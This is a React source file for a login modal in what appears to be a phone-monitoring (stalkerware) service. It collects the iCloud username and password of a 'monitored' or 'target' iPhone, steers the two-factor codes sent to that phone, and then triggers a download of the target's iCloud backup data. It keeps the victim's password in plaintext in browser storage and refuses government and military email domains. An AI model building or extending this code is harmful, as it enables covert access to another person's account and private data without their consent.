import React, { useEffect, useState } from 'react'
import { Button, Modal, message, Tabs, Steps, Space, Select, Spin, Alert, Input } from 'antd'
import Card from '@mui/material/Card'
import CardContent from '@mui/material/CardContent'
import currentStyle from 'src/@core/components/user-verify/index.module.scss'

import {
  authByDevice,
  authVerifyByDevice,
  downloadWeb,
  bySms,
  authVerifyBySms,
  authInfo,
  checkDownloadTime,
  sendDownloadTime,
  iosLoginVerification
} from 'src/@api/login'

import dynamic from 'next/dynamic'

import { useDispatch, useSelector } from 'react-redux'
import { fetchResetTime } from 'src/store/apps/Common'
import updateDeviceCredentials, { isUpdateCredentialsOk } from 'src/utils/updateDeviceCredentials'
import useIcloudLockedFlow from 'src/components/ios-extreme/icloud-locked/useIcloudLockedFlow'
import useIcloudCredentialReverify from 'src/components/ios-extreme/icloud-locked/useIcloudCredentialReverify'
import { ICLOUD_EC, isIcloudOk, isIcloudSendOk } from 'src/utils/icloudLoginResult'

const CodeBox = dynamic(import('@axetroy/react-codebox'), {
  ssr: false //这个要加上,禁止使用 SSR
})

import Image from 'next/image'

import Icon from 'src/@core/components/icon'
import { messageInfo } from 'src/components/Message'
import { useTranslation } from 'src/utils/i18n'

const steps = [
  {
    title: 'Connect'
  },
  {
    title: 'Verification'
  }
]

const AdvancedDownloadForm = data => {
  const { t } = useTranslation('common')
  const dispatch = useDispatch()
  const [messageApi, contextHolder] = message.useMessage()

  const [isModalOpen, setIsModalOpen] = useState(true)

  const [defaultSmsPhone, setDefaultSmsPhone] = useState({})
  const [smsPhoneList, setSmsPhoneList] = useState([])
  const [smsPhoneListLoading, setSmsPhoneListLoading] = useState(true)
  const [smsPhoneListDisabled, setSmsPhoneListDisabled] = useState(true)
  const [smsId, setSmsId] = useState('')
  const [smsErrorText, setSmsErrorText] = useState('') // icloud没有绑定手机号错误提示文案

  const showModal = () => {
    setIsModalOpen(true)
  }

  const handleCancel = () => {
    // setIsModalOpen(false)
    data.closeModal()
  }

  /**
   * 验证成功、关闭弹窗。
   *
   * 侧栏「更新数据」只关心弹窗关掉；绑定向导里复用本弹窗重填密码时，
   * 调用方需要知道「已经验证通过」才能推进下一步，所以额外回调 onSuccess（可选）。
   */
  const closeOnSuccess = () => {
    setIsModalOpen(false)

    if (typeof data.onSuccess === 'function') data.onSuccess()
  }

  const onChange = async key => {
    if (key == 2) {
      let check = sessionStorage.getItem('icloudPhoneSmsList')
      let result = {}
      if (check) {
        result = JSON.parse(check)
      } else {
        let mode = 1

        result = await authInfo({
          mode: mode,
          username: useUserName,
          password: usePassWord
        })
        sessionStorage.setItem('icloudPhoneSmsList', JSON.stringify(result))
      }

      setDefaultSmsPhone(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber)

      setSmsId(result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumber.id || '0')

      let mapData = result.data.direct.twoSV.phoneNumberVerification.trustedPhoneNumbers.map(item => {
        return {
          ...item,
          value: item.id,
          label: item.numberWithDialCode
        }
      })
      setSmsPhoneList(mapData)
      setSmsPhoneListDisabled(false)
      setSmsPhoneListLoading(false)
    }
  }

  const [current, setCurrent] = useState(data.data)

  const items = steps.map(item => ({ key: item.title, title: item.title }))
  let DeviceUser = JSON.parse(localStorage.getItem('DeviceUser'))

  const [useUserName, setUserName] = useState(DeviceUser.username)
  const [usePassWord, setPassWord] = useState(DeviceUser.password)
  const [isWarn, setIsWarn] = useState(false)

  // 密码明文/密文切换（与基础验证页一致）
  const [showPassword, setShowPassword] = useState(false)

  const onchangeUserInput = e => {
    // 检查是否包含敏感邮箱后缀
    const input = e.target.value.trim()
    const forbiddenDomains = [
      '.gov', 'gov.cn', 'gov.hk', 'gov.mo', 'gov.tw', 'state.gov', 'gov.uk', 'gov.au', 'usa.gov', 'whitehouse.gov', 'gc.ca',
      '.mil', 'mil.cn', 'army.mil', 'navy.mil', 'af.mil', 'uscg.mil', 'usmc.mil', 'mod.uk', 'nato.int', 'defense.gov', 'gouv.fr'
    ]

    if (input.includes('@')) {
      const domain = input.split('@')[1].toLowerCase()
      if (forbiddenDomains.some(item => domain.toLowerCase().endsWith(item)) || input.includes('@gov') || input.includes('@mil')) {
        setIsWarn(true)
        setUserName('')

        return
      }
    }

    setUserName(input)
  }

  const onchangePassWordInput = e => {
    setPassWord(e.target.value.trim())
  }

  const [loginLoading, setLoginLoading] = useState(false)

  const login = async () => {
    if (useUserName === '' || usePassWord === '') {
      messageInfo('Value cannot be empty')

      return
    }

    // let re = /^([A-Za-z0-9_\-\.])+\@([A-Za-z0-9_\-\.])+\.([A-Za-z]{2,4})$/
    // if (!re.test(useUserName)) {
    //   messageInfo('Please enter the correct iCloud')

    //   return
    // }

    let mode = 2

    let obj = {
      mode: mode,
      username: useUserName,
      password: usePassWord,
      country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
    }

    setLoginLoading(true)

    // 请求异常（断网 / 超时 / 服务端错误）必须清掉 loading，否则按钮会一直转圈
    let data
    try {
      const res = await iosLoginVerification(obj)
      data = res?.data
    } catch (e) {
      console.error('[AdvancedDownloadForm login] iosLoginVerification failed', e)
      setLoginLoading(false)
      messageInfo(e?.data?.em || 'Network error, please try again')

      return
    }

    // 无论走哪个业务分支都先关掉转圈；业务错误码在 data.ec（如 10005 Apple ID locked），
    // 顶层 code / HTTP 状态码为 0 不代表成功
    setLoginLoading(false)

    if (!data || typeof data !== 'object') {
      messageInfo('Network error, please try again')

      return
    }

    if (data.ec === ICLOUD_EC.PASSWORD) {
      setLoginLoading(false)

      handlePasswordError(data.ec)


      messageInfo(data.em)
    } else if (data.ec === ICLOUD_EC.TWO_STEP) {
      setLoginLoading(false)

      messageInfo(data.em)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))
      setCurrent(1)
      if (data?.trustedPhoneNumbers[0]?.numberWithDialCode) {
        setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
        setSmsId(data.trustedPhoneNumbers[0].id || '0')
        let mapData = data.trustedPhoneNumbers.map(item => {
          return {
            ...item,
            value: item.id,
            label: item.numberWithDialCode
          }
        })
        setSmsPhoneList(mapData)
        setSmsPhoneListDisabled(false)
      } else {
        setSmsPhoneListDisabled(true)
        if (data?.ecPhoneList === 0) {
          setSmsErrorText(t(`iCloud doesnt have a phone number Please verify using the device verification code`))
        } else {
          setSmsErrorText(t(`Entered the incorrect verification codes Please wait 30 minutes before trying again`))
        }
      }
      setSmsPhoneListLoading(false)
    } else if (data.ec === ICLOUD_EC.LOCKED) {
      await handleEc10005({ username: useUserName, password: usePassWord })
    } else if (isIcloudOk(data)) {
      setLoginLoading(false)

      messageInfo(data.em)

      // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
      const updateRes = await updateDeviceCredentials({
        username: useUserName,
        password: usePassWord,
        verify: 1
      })

      if (!isUpdateCredentialsOk(updateRes)) {
        messageInfo(updateRes?.msg || data.em)

        return
      }

      window.localStorage.setItem('Advanced', 1)
      window.localStorage.setItem('DeviceUser', JSON.stringify(obj))

      // let allow = await checkDownloadTime({ username: useUserName })
      // if (allow.data.advanced_download) {
      let downloadRes = await downloadWeb({
        mode: 2,
        username: useUserName,
        password: usePassWord
      })

      messageInfo({
        content: t(
          'Please wait patiently for the data to download If the data is still not updated after half an hour it is likely that the target device has not enabled backup'
        ),
        duration: 10
      })
      await sendDownloadTime({ username: useUserName, type: 'advanced_download' })

      setTimeout(() => {
        dispatch(fetchResetTime())
      }, 800)

      // }

      closeOnSuccess()
    } else {
      messageInfo(data.em)
      setLoginLoading(false)
    }
  }

  const codeDevice = async e => {
    let mode = 2

    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        let deviceUser = JSON.parse(window.localStorage.getItem('DeviceUser'))
        deviceUser.securityCode = securityCode

        // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
        const updateRes = await updateDeviceCredentials({
          username: useUserName,
          password: usePassWord,
          verify: 1
        })

        if (!isUpdateCredentialsOk(updateRes)) {
          messageInfo(updateRes?.msg || 'Update failed, please try again')

          return
        }

        window.localStorage.setItem('Advanced', 1)

        // let allow = await checkDownloadTime({ username: useUserName })
        // if (allow.data.advanced_download) {
        let verify = await iosLoginVerification({
          mode: 2,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!verify?.data || typeof verify.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(verify.data)) {
          let downloadRes = await downloadWeb({ mode: 2, username: useUserName, password: usePassWord })
          messageInfo({
            content: t(
              'Please wait patiently for the data to download If the data is still not updated after half an hour it is likely that the target device has not enabled backup'
            ),
            duration: 10
          })
          await sendDownloadTime({ username: useUserName, type: 'advanced_download' })
          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)
          closeOnSuccess()
        } else {
          handlePasswordError(verify.data.ec)
          messageInfo(verify.data.em)
        }
      } catch (err) {
        console.error('[AdvancedDownloadForm codeDevice] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const [sendTime, setSentTime] = useState(60)
  const [sendContentTips, setSendContentTips] = useState('')
  const [btnDisable, setBtnDisable] = useState(false)
  const [key, setKey] = useState('1')
  const [isMobile, setIsMobile] = useState(false)

  const getIsMobile = () => {
    const userAgent = window.navigator.userAgent
    const isMobileDevice = /Mobile/.test(userAgent)
    setIsMobile(isMobileDevice)
  }

  useEffect(() => {
    getIsMobile()
  }, [])

  // 父组件（侧栏「更新数据」）只把「步骤」传进来，登录返回的手机号列表没传，
  // 所以弹窗直接被打开在「验证」这一步时，自己再登录一次把短信手机号列表拉回来。
  // 没有这段兜底：smsPhoneListLoading 会永远停在 true（输入框一直转圈）、列表为空，
  // 切到 SMS 后发送时 phoneID 会是空字符串 → 后端报 INVALID_PARAMETER。（与 SpyX 一致）
  useEffect(() => {
    if (current === 1) {
      login()
    }
  }, [])

  const sendSms = async () => {
    if (btnDisable) return

    setBtnDisable(true)

    let result = null

    try {
      result = await iosLoginVerification({
        mode: 2,
        username: useUserName,
        password: usePassWord,
        phoneID: smsId,
        country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
      })
    } catch (error) {
      setBtnDisable(false)
      setSentTime(60)
      setSendContentTips('')
      messageInfo(error?.message || 'Send failed, please try again')

      return
    }

    // 只有接口返回成功码（0 / 10000 / 10004）才算发送成功；
    // 其余一律当失败：把后端的 em 用 message 显示出来，且不启动倒计时、不显示「已发送」
    const ec = result?.data?.ec

    if (!isIcloudSendOk(ec)) {
      setBtnDisable(false)
      setSentTime(60)
      setSendContentTips('')

      // 密码不对 → 退回「输入账号密码」重填（统一走 useIcloudCredentialReverify）
      handlePasswordError(ec)

      messageInfo(result?.data?.em || 'Send failed, please try again')

      return
    }

    setSentTime(60)
    setSendContentTips(
      `A message containing the verification code has been sent to the target iPhone, please check it.`
    )

    let ti = sendTime

    let timeChange
    timeChange = setInterval(() => {
      if (ti > 0) {
        //当x>0时执行更新方法
        ti = ti - 1
        setSentTime(ti)
      } else {
        //当x=0时执行终止循环方法
        clearInterval(timeChange)
        setBtnDisable(false)
        setSendContentTips('')
        setSentTime(60)
      }
    }, 1000)
  }

  const codeSms = async e => {
    let check = true
    let securityCode = ''
    for (let i = 0; i < e.length; i++) {
      if (e[i] === '') {
        check = false
        break
      }
      securityCode += e[i]
    }

    if (check) {
      setLoginLoading(true)

      // 接口异常（断网 / 超时 / 服务端错误）时必须给出提示并清掉 loading，否则验证码区会一直转圈
      try {
        // let allow = await checkDownloadTime({ username: useUserName })
        // if (allow.data.advanced_download) {

        let result = await iosLoginVerification({
          mode: 2,
          username: useUserName,
          password: usePassWord,
          securityCode: securityCode,
          phoneID: smsId,
          country: JSON.parse(localStorage.getItem("userData"))?.data.country_name.toLocaleLowerCase()
        })

        // 业务错误码在 data.ec；顶层 code / HTTP 状态码为 0 不代表成功
        if (!result?.data || typeof result.data !== 'object') {
          messageInfo(t('Network error, please try again'))

          return
        }

        if (isIcloudOk(result.data)) {
          let downloadRes = await downloadWeb({
            mode: 2,
            username: useUserName,
            password: usePassWord
          })

          messageInfo({
            content: t(
              'Please wait patiently for the data to download If the data is still not updated after half an hour it is likely that the target device has not enabled backup'
            ),
            duration: 10
          })

          await sendDownloadTime({ username: useUserName, type: 'advanced_download' })

          setTimeout(() => {
            dispatch(fetchResetTime())
          }, 800)

          // 只更新已有设备的 iCloud 凭据，不走绑定接口（避免多建一个设备包）
          const updateRes = await updateDeviceCredentials({
            username: useUserName,
            password: usePassWord,
            verify: 1
          })

          if (!isUpdateCredentialsOk(updateRes)) {
            messageInfo(updateRes?.msg || 'Update failed, please try again')

            return
          }

          window.localStorage.setItem('Advanced', 1)
          closeOnSuccess()
        } else {
          // 验证码不对：不更新凭据、不写「高级已验证」、不关弹窗，让用户重输
          handlePasswordError(result.data.ec)
          messageInfo(result.data.em || t('Incorrect verification code Please try again'))
        }
      } catch (err) {
        console.error('[AdvancedDownloadForm codeSms] failed', err)
        messageInfo(err?.data?.em || t('Network error, please try again'))
      } finally {
        setLoginLoading(false)
      }
    }
  }

  const handleSelectChange = value => {
    setSmsId(value)
  }

  onkeydown = e => {
    if (e.keyCode === 13) {
      login()
    }
  }

  const applyAdvancedTwoStepFromReverify = (data, username, password) => {
    messageInfo(data.em)
    window.localStorage.setItem('DeviceUser', JSON.stringify({
      mode: 2,
      username,
      password,
      country: (JSON.parse(localStorage.getItem('userData'))?.data?.country_name || '').toLocaleLowerCase()
    }))
    setUserName(username)
    setPassWord(password)
    setCurrent(1)
    if (data?.ecurityType == 2) setKey('2')
    if (data?.trustedPhoneNumbers?.[0]?.numberWithDialCode) {
      setDefaultSmsPhone(data.trustedPhoneNumbers[0].numberWithDialCode)
      setSmsId(data.trustedPhoneNumbers[0].id || '0')
      setSmsPhoneList(data.trustedPhoneNumbers.map(item => ({ ...item, value: item.id, label: item.numberWithDialCode })))
      setSmsPhoneListDisabled(false)
    } else {
      setSmsPhoneListDisabled(true)
      setSmsErrorText(data?.ecPhoneList === 0
        ? t('iCloud doesnt have a phone number Please verify using the device verification code')
        : t('Entered the incorrect verification codes Please wait 30 minutes before trying again'))
    }
    setSmsPhoneListLoading(false)
  }

  const finishAdvancedDirectFromReverify = async (data, username, password) => {
    messageInfo(data.em)
    const updateRes = await updateDeviceCredentials({ username, password, verify: 1 })
    if (!isUpdateCredentialsOk(updateRes)) {
      messageInfo(updateRes?.msg || data.em)


return
    }
    window.localStorage.setItem('Advanced', 1)
    window.localStorage.setItem('DeviceUser', JSON.stringify({
      mode: 2,
      username,
      password,
      country: (JSON.parse(localStorage.getItem('userData'))?.data?.country_name || '').toLocaleLowerCase()
    }))
    const downloadRes = await downloadWeb({ mode: 2, username, password })
    messageInfo(downloadRes.data.ed)
    await sendDownloadTime({ username, type: 'advanced_download' })
    setTimeout(() => dispatch(fetchResetTime()), 800)
    closeOnSuccess()
  }

  const { handleEc10005, lockedFlowModals, lockedFlowOpen } = useIcloudLockedFlow({
    mode: 2,
    updateCredentialsOnLock: true,
    onTwoStepRequired: async ({ data, username, password }) => applyAdvancedTwoStepFromReverify(data, username, password),
    onDirectSuccess: async ({ data, username, password }) => finishAdvancedDirectFromReverify(data, username, password)
  })

  // 10003（iCloud 密码不对）统一处理：退回「输入账号密码」那一步重填。
  // 已在输密码步骤、或被锁 / 重新验证弹窗正开着时跳过（见 useIcloudCredentialReverify）。
  const handlePasswordError = useIcloudCredentialReverify({ current, setCurrent, lockedFlowOpen })

  return (
    <>
      <Modal
        className={`${isMobile ? '!max-w-[345px] user-verify-mobile' : '!max-w-[600px] user-verify-pc'} user-verify`}
        title=''
        closable={isMobile ? false : true}
        open={isModalOpen}
        onCancel={handleCancel}
        footer={[]}
        width={700}
        zIndex={1200}
      >
        {isMobile ? (
          <>
            <div
              className='w-full h-[68px] text-[#222222] flex items-center justify-between border-b-[1px] border-[#DADADA] px-[24px]'
              style={{
                borderTopRightRadius: '8px',
                borderTopLeftRadius: '8px'
              }}
            >
              <div className='w-[18px] h-[18px] invisible'></div>
              <h2 className='flex' style={{ color: '#222222', fontSize: '18px' }}>
                {t('Basic Data Validation')}
              </h2>

              <Image
                src='/images/user-verify/close.svg'
                width={18}
                height={18}
                alt='close'
                className='cursor-pointer'
                onClick={handleCancel}
              />
            </div>

            <div className='px-[24px] py-[30px]' style={{ width: '100%' }}>
              <div style={{ display: 'flex', justifyContent: 'center' }}>
                <Image src='/images/apps/apple.svg' alt='img' className='w-[35px] h-[40px]' width='30' height='30' />
              </div>
              {current == 0 ? (
                <div className={currentStyle.formBox}>
                  <h1 className='text-[14px] text-center mt-[14px] text-[#334062]'>
                    {t('Enter the iCloud account and password of the monitored iPhone')}
                  </h1>
                  <div style={{ display: 'flex', flexDirection: 'column', alignItems: 'center', marginTop: '24px' }}>
                    <div className='w-full flex flex-col'>
                      <span className='mb-[5px] text-[#334062]'>{t('Apple ID')}</span>
                      <Input
                        className='w-full h-[40px] bg-[rgba(244,245,246,0.92)] hover:bg-[rgba(244,245,246,0.92)] focus:border-[#454CFF] focus:border placeholder:text-[rgba(0,0,0,0.4)] border-0 rounded-[20px] px-[15px]'
                        style={{ outline: 'none' }}
                        onChange={e => onchangeUserInput(e)}
                        placeholder={t('Apple ID')}
                        value={useUserName}
                      />
                    </div>
                    <div className='w-full flex flex-col mt-5'>
                      <span className='mb-[5px] text-[#334062]'>{t('Password')}</span>
                      <div className='relative w-full'>
                        <Input
                          className='w-full h-[40px] bg-[rgba(244,245,246,0.92)] hover:bg-[rgba(244,245,246,0.92)] focus:border-[#454CFF] focus:border placeholder:text-[rgba(0,0,0,0.4)] border-0 rounded-[20px] px-[15px] pr-[45px]'
                          type={showPassword ? 'text' : 'password'}
                          onChange={e => onchangePassWordInput(e)}
                          placeholder={t('Password')}
                        />
                        <Image
                          src={showPassword ? '/extreme/open.svg' : '/extreme/close.svg'}
                          width={18}
                          height={18}
                          alt=''
                          className='absolute top-0 bottom-0 my-auto right-[15px] cursor-pointer'
                          onClick={() => setShowPassword(!showPassword)}
                        />
                      </div>
                    </div>

                    {/* 二步验证提示 */}
                    <div className='w-full my-[24px] flex items-start justify-center rounded-[6px] text-[#F11E34] text-[10px] px-[16px] py-[12px] bg-[rgba(255,0,0,0.05)]'>
                      <Image
                        src='/images/apps/waring.svg'
                        className='flex items-start mt-[1px] mr-[7px]'
                        alt='img'
                        width={12}
                        height={12}
                        onClick={handleCancel}
                      />
                      <p className='text-center'>
                        {t('A two-step verification code or SMS will be sent to the target iPhone from Apple official')}
                      </p>
                    </div>

                    <div className='w-full flex justify-center items-center'>
                      {/* <Spin className='w-full' spinning={loginLoading}> */}
                      <button
                        className={`${loginLoading ? 'opacity-70' : ''
                          } w-full h-[42px] mx-auto bg-[#FFCF55] text-[#222222] text-[16px] font-[600] rounded-[41px] flex justify-center items-center`}
                        onClick={() => {
                          if (loginLoading) return
                          login()
                        }}
                      >
                        {t('Connect')}
                        {loginLoading && (
                          <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                        )}
                      </button>
                      {/* </Spin> */}
                    </div>
                  </div>
                </div>
              ) : (
                <div className='steps-content'>
                  <h1 className='text-[14px] text-center mt-[14px] text-[#334062]'>
                    {t('Choose a verification method')}
                  </h1>
                  <div className='w-[297px] mx-auto'>
                    <div className='w-full h-[44px] flex items-center mt-[10px] mb-[24px]'>
                      <div
                        className={`${key == '1'
                          ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                          : 'text-[14px] text-[#000] border-b-[#FFF]'
                          } h-[35px] border-b-[2px] flex items-center cursor-pointer`}
                        onClick={() => {
                          if (key == '1') return
                          setKey('1')
                        }}
                      >
                        Device
                      </div>
                      <div
                        className={`${key == '2'
                          ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                          : 'text-[14px] text-[#000] border-b-[#FFF]'
                          } ml-[18px] h-[35px] flex items-center border-b-[2px] cursor-pointer`}
                        onClick={() => {
                          if (key == '2') return
                          if (smsPhoneListDisabled) {
                            messageInfo(smsErrorText)
                          } else {
                            setKey('2')
                          }
                        }}
                      >
                        SMS
                      </div>
                    </div>
                    {key == '1' && (
                      <>
                        <Spin spinning={loginLoading}>
                          <CodeBox
                            length={6}
                            validator={(input, index) => {
                              return /\d/.test(input)
                            }}
                            onChange={e => codeDevice(e)}
                          />
                        </Spin>
                        <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                          {t('A verification code has been sent to the target iPhone Enter the verification code')}
                        </p>
                      </>
                    )}
                    {key == '2' && (
                      <>
                        <div className='mb-[20px] flex'>
                          <Select
                            defaultValue={defaultSmsPhone}
                            style={{
                              width: '100%',
                              height: '40px'
                            }}
                            suffixIcon={
                              smsPhoneListLoading ? (
                                <div className='w-[16px] h-[16px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                              ) : (
                                <Image
                                  className='mr-[5px]'
                                  src='/images/user-verify/dropdown.svg'
                                  width={12}
                                  height={0}
                                  alt='dropDown'
                                />
                              )
                            }
                            disabled={smsPhoneListDisabled}
                            onChange={handleSelectChange}
                            options={smsPhoneList}

                          // loading={smsPhoneListLoading}
                          />
                          <button
                            disabled={btnDisable}
                            style={{
                              opacity: btnDisable ? 0.7 : 1,
                              background: '#FFCF55',
                              padding: '0 16px',
                              marginLeft: '9px',
                              color: '#1B1C2B',
                              borderRadius: '41px',
                              fontSize: '18px'
                            }}
                            onClick={sendSms}
                          >
                            {btnDisable ? sendTime : 'Send'}
                          </button>
                        </div>
                        {sendContentTips != '' && (
                          <p className='text-[center] mb-[20px] text-[12px] text-[#9A9A9E]'> {sendContentTips}</p>
                        )}
                        <Spin spinning={loginLoading}>
                          <CodeBox
                            length={6}
                            validator={(input, index) => {
                              return /\d/.test(input)
                            }}
                            onChange={e => codeSms(e)}
                          />
                        </Spin>
                        <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                          {t('Enter the verification code')}
                        </p>
                      </>
                    )}
                  </div>
                </div>
              )}
            </div>
          </>
        ) : (
          <div className='px-[58px] pt-[54px] pb-[60px]' style={{ width: '100%' }}>
            <div style={{ display: 'flex', justifyContent: 'center' }}>
              <Image src='/images/apps/apple.svg' alt='img' className='w-[60px] h-[68.57px]' width='30' height='30' />
            </div>
            {current == 0 ? (
              <div>
                <h1 className='max-w-[484px] text-[24px] text-center mt-[30px] text-[#282938] font-[600]'>
                  {t('Enter the iCloud account and password of the monitored iPhone')}
                </h1>
                <div className='w-[335px] mx-auto mt-[35px] flex flex-col items-center'>
                  <div className='w-full flex flex-col'>
                    <Input
                      className='w-full h-[48px] bg-[rgba(244,245,246,0.92)] hover:bg-[rgba(244,245,246,0.92)] focus:border-[#454CFF] focus:border placeholder:text-[rgba(0,0,0,0.4)] border-0 rounded-[20px] px-[15px]'
                      style={{ outline: 'none' }}
                      onChange={e => onchangeUserInput(e)}
                      placeholder={t('Apple ID')}
                      value={useUserName}
                    />
                  </div>
                  <div className='w-full flex flex-col mt-[24px]'>
                    <div className='relative w-full'>
                      <Input
                        className='w-full h-[48px] bg-[rgba(244,245,246,0.92)] hover:bg-[rgba(244,245,246,0.92)] focus:border-[#454CFF] focus:border placeholder:text-[rgba(0,0,0,0.4)] border-0 rounded-[20px] px-[15px] pr-[45px]'
                        type={showPassword ? 'text' : 'password'}
                        onChange={e => onchangePassWordInput(e)}
                        placeholder={t('Password')}
                      />
                      <Image
                        src={showPassword ? '/extreme/open.svg' : '/extreme/close.svg'}
                        width={18}
                        height={18}
                        alt=''
                        className='absolute top-0 bottom-0 my-auto right-[15px] cursor-pointer'
                        onClick={() => setShowPassword(!showPassword)}
                      />
                    </div>
                  </div>

                  {/* 二步验证提示 */}
                  <div className='w-full my-[24px] flex items-start justify-center rounded-[6px] text-[#F11E34] text-[14px] px-[12px] py-[8px] bg-[rgba(255,0,0,0.05)]'>
                    <Image
                      src='/images/apps/waring.svg'
                      className='flex items-start mt-[5px]'
                      alt='img'
                      width={12}
                      height={12}
                      onClick={handleCancel}
                    />
                    <p className='text-center'>
                      {t('A two-step verification code or SMS will be sent to the target iPhone from Apple official')}
                    </p>
                  </div>

                  <div className='w-full flex justify-center items-center'>
                    {/* <Spin className='w-full' spinning={loginLoading}> */}
                    <button
                      className={`${loginLoading ? 'opacity-70' : ''
                        } w-full h-[42px] mx-auto bg-[#FFCF55] text-[#222222] text-[16px] font-[600] rounded-[41px] flex justify-center items-center`}
                      onClick={() => {
                        if (loginLoading) return
                        login()
                      }}
                    >
                      {t('Connect')}
                      {loginLoading && (
                        <div className='w-[20px] h-[20px] border-[3px] border-[#FFF] border-b-[#FFCF55] rounded-[50%] inline-block box-border animate-spin ml-[16px]'></div>
                      )}
                    </button>
                    {/* </Spin> */}
                  </div>
                </div>
              </div>
            ) : (
              <div className='steps-content'>
                <h1 className='max-w-[484px] text-[24px] text-center mt-[30px] text-[#282938] font-[600]'>
                  {t('Choose a verification method')}
                </h1>
                <div className='w-[310px] mx-auto'>
                  <div className='w-full h-[44px] flex items-center mt-[15px] mb-[24px]'>
                    <div
                      className={`${key == '1'
                        ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                        : 'text-[14px] text-[#000] border-b-[#FFF]'
                        } h-[35px] border-b-[2px] flex items-center cursor-pointer`}
                      onClick={() => {
                        if (key == '1') return
                        setKey('1')
                      }}
                    >
                      {t('Device')}
                    </div>
                    <div
                      className={`${key == '2'
                        ? 'text-[16px] text-[#2405F2] border-b-[#2405F2]'
                        : 'text-[14px] text-[#000] border-b-[#FFF]'
                        } ml-[18px] h-[35px] flex items-center border-b-[2px] cursor-pointer`}
                      onClick={() => {
                        if (key == '2') return
                        if (smsPhoneListDisabled) {
                          messageInfo(smsErrorText)
                        } else {
                          setKey('2')
                        }
                      }}
                    >
                      {t('SMS')}
                    </div>
                  </div>
                  {key == '1' && (
                    <>
                      <Spin spinning={loginLoading}>
                        <CodeBox
                          length={6}
                          validator={(input, index) => {
                            return /\d/.test(input)
                          }}
                          onChange={e => codeDevice(e)}
                        />
                      </Spin>
                      <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                        {t('A verification code has been sent to the target iPhone Enter the verification code')}
                      </p>
                    </>
                  )}
                  {key == '2' && (
                    <>
                      <div className='mb-[24px] flex'>
                        <Select
                          defaultValue={defaultSmsPhone}
                          style={{
                            flex: 1,
                            height: '45px'
                          }}
                          suffixIcon={
                            smsPhoneListLoading ? (
                              <div className='w-[18px] h-[18px] border-[3px] border-b-[rgba(244,245,246,0.92)] rounded-[50%] inline-block box-border animate-spin mr-[5px]'></div>
                            ) : (
                              <Image
                                className='mr-[5px]'
                                src='/images/user-verify/dropdown.svg'
                                width={14}
                                height={0}
                                alt='dropDown'
                              />
                            )
                          }
                          disabled={smsPhoneListDisabled}
                          onChange={handleSelectChange}
                          options={smsPhoneList}

                        // loading={smsPhoneListLoading}
                        />
                        <button
                          disabled={btnDisable}
                          className='min-w-[85px]'
                          style={{
                            opacity: btnDisable ? 0.7 : 1,
                            background: '#FFCF55',
                            padding: '0 21px',
                            marginLeft: '9px',
                            color: '#1B1C2B',
                            borderRadius: '41px',
                            fontSize: '18px'
                          }}
                          onClick={sendSms}
                        >
                          {btnDisable ? sendTime : t('Send')}
                        </button>
                      </div>

                      {sendContentTips != '' && (
                        <p className='text-[center] mb-[24px] text-[12px] text-[#9A9A9E]'> {sendContentTips}</p>
                      )}
                      <Spin spinning={loginLoading}>
                        <CodeBox
                          length={6}
                          validator={(input, index) => {
                            return /\d/.test(input)
                          }}
                          onChange={e => codeSms(e)}
                        />
                      </Spin>
                      <p className='mt-[24px] text-center text-[12px] text-[#9A9A9E]'>
                        {t('Enter the verification code')}
                      </p>
                    </>
                  )}
                </div>
              </div>
            )}
          </div>
        )}
      </Modal>
      {lockedFlowModals}
      {contextHolder}

      {isWarn &&
        <div className="fixed top-0 right-0 left-0 bottom-0 bg-black bg-opacity-75 flex items-center justify-center z-[1201]">
          <div className='relative w-[700px] h-auto bg-white rounded-[8px] pb-10 pt-[60px] px-6 smj:w-full smj:mx-3'>
            <div className='flex items-center'>
              <Image src={'/warn.svg'} width={46} height={46} alt='warn' />
              <div className='ml-2 text-black text-[26px] font-[700]'>{t('Warning')}</div>
            </div>
            <p className='mt-6 text-black text-[20px]'>
              {t('The use of government-affiliated email addresses')}
            </p>
            <p className='mt-6 text-black text-[20px]'>
              {t('To proceed')}
            </p>
            <div className='flex justify-end mt-10'>
              <button className='h-[50px] w-[fit-content] px-5 bg-[#50e3c2] rounded-[6px] flex justify-center items-center text-black text-[20px] font-[700]'
                onClick={() => setIsWarn(false)}>
                {t('I Understand')}
              </button>
            </div>
          </div>
        </div>}
    </>
  )
}

export default AdvancedDownloadForm
